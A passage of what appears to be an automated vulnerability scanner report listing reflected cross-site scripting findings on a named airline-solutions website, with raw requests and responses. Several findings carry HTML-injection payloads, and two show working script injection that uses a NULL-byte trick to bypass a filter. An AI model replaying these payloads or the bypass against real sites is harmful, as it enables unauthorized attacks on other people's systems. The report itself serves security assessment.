Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:06:56 GMT
Pragma: no-cache
Content-Length: 2151
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500f646a"><a>cdfa7ce7308" />
...[SNIP]...

3.90. http://www.sabreairlinesolutions.com/home/includes/form_issues [iframe parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6401"><a>928de2f5074 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_issues?issue=fuel_management&iframe=truef6401"><a>928de2f5074&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/fuel_management
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322566; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:00:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322566; expires=Thu, 06-Oct-2011 10:00:42 GMT; path=/
Set-Cookie: exp_last_activity=1286377242; expires=Thu, 06-Oct-2011 10:00:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:00:43 GMT
Pragma: no-cache
Content-Length: 2141
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=fuel_management&iframe=truef6401"><a>928de2f5074&width=500&height=500" />
...[SNIP]...

3.91. http://www.sabreairlinesolutions.com/home/includes/form_issues [issue parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The value of the issue request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ad6"><a>c3d3c691540 was submitted in the issue parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_issues?issue=irregular_operations19ad6"><a>c3d3c691540&iframe=true&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:56:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 09:56:22 GMT; path=/
Set-Cookie: exp_last_activity=1286376982; expires=Thu, 06-Oct-2011 09:56:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:56:23 GMT
Pragma: no-cache
Content-Length: 2173
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=irregular_operations19ad6"><a>c3d3c691540&iframe=true&width=500&height=500" />
...[SNIP]...

3.92. http://www.sabreairlinesolutions.com/home/includes/form_issues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002ecc8"><script>alert(1)</script>79c91da2525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ecc8"><script>alert(1)</script>79c91da2525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500&%002ecc8"><script>alert(1)</script>79c91da2525=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:29:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 10:29:30 GMT; path=/
Set-Cookie: exp_last_activity=1286378970; expires=Thu, 06-Oct-2011 10:29:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:29:30 GMT
Pragma: no-cache
Content-Length: 2179
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500&%002ecc8"><script>alert(1)</script>79c91da2525=1" />
...[SNIP]...

3.93. http://www.sabreairlinesolutions.com/home/includes/form_issues [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3eca"><a>778f54e83ba was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_issues?issue=fuel_management&iframe=true&width=500b3eca"><a>778f54e83ba&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/fuel_management
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322566; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:02:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322566; expires=Thu, 06-Oct-2011 10:02:44 GMT; path=/
Set-Cookie: exp_last_activity=1286377348; expires=Thu, 06-Oct-2011 10:02:44 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:02:44 GMT
Pragma: no-cache
Content-Length: 2141
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=fuel_management&iframe=true&width=500b3eca"><a>778f54e83ba&height=500" />
...[SNIP]...

3.94. http://www.sabreairlinesolutions.com/home/includes/form_suites [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ec7"><a>1395fc53d3 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500a3ec7"><a>1395fc53d3 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:21:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:21:00 GMT; path=/
Set-Cookie: exp_last_activity=1286378460; expires=Thu, 06-Oct-2011 10:21:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:21:01 GMT
Pragma: no-cache
Content-Length: 2151
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500a3ec7"><a>1395fc53d3" />
...[SNIP]...

3.95. http://www.sabreairlinesolutions.com/home/includes/form_suites [iframe parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81e8"><a>c3993814117 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_suites?suite=enterprise_operations&iframe=truea81e8"><a>c3993814117&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:15:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:15:33 GMT; path=/
Set-Cookie: exp_last_activity=1286378133; expires=Thu, 06-Oct-2011 10:15:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:15:33 GMT
Pragma: no-cache
Content-Length: 2152
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=truea81e8"><a>c3993814117&width=500&height=500" />
...[SNIP]...

3.96. http://www.sabreairlinesolutions.com/home/includes/form_suites [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002f18b"><script>alert(1)</script>589c7a48f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f18b"><script>alert(1)</script>589c7a48f61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500&%002f18b"><script>alert(1)</script>589c7a48f61=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:40:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:40:58 GMT; path=/
Set-Cookie: exp_last_activity=1286379657; expires=Thu, 06-Oct-2011 10:40:58 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:40:58 GMT
Pragma: no-cache
Content-Length: 2180
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500&%002f18b"><script>alert(1)</script>589c7a48f61=1" />
...[SNIP]...

3.97. http://www.sabreairlinesolutions.com/home/includes/form_suites [suite parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The value of the suite request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8748e"><a>3f2efd2f839 was submitted in the suite parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_suites?suite=enterprise_operations8748e"><a>3f2efd2f839&iframe=true&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:12:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:12:08 GMT; path=/
Set-Cookie: exp_last_activity=1286377928; expires=Thu, 06-Oct-2011 10:12:08 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:12:09 GMT
Pragma: no-cache
Content-Length: 2174
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations8748e"><a>3f2efd2f839&iframe=true&width=500&height=500" />
...[SNIP]...

3.98. http://www.sabreairlinesolutions.com/home/includes/form_suites [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f32"><a>5557ac528ce was submitted in the width parameter. This input was echoed unmodified in the application's response.

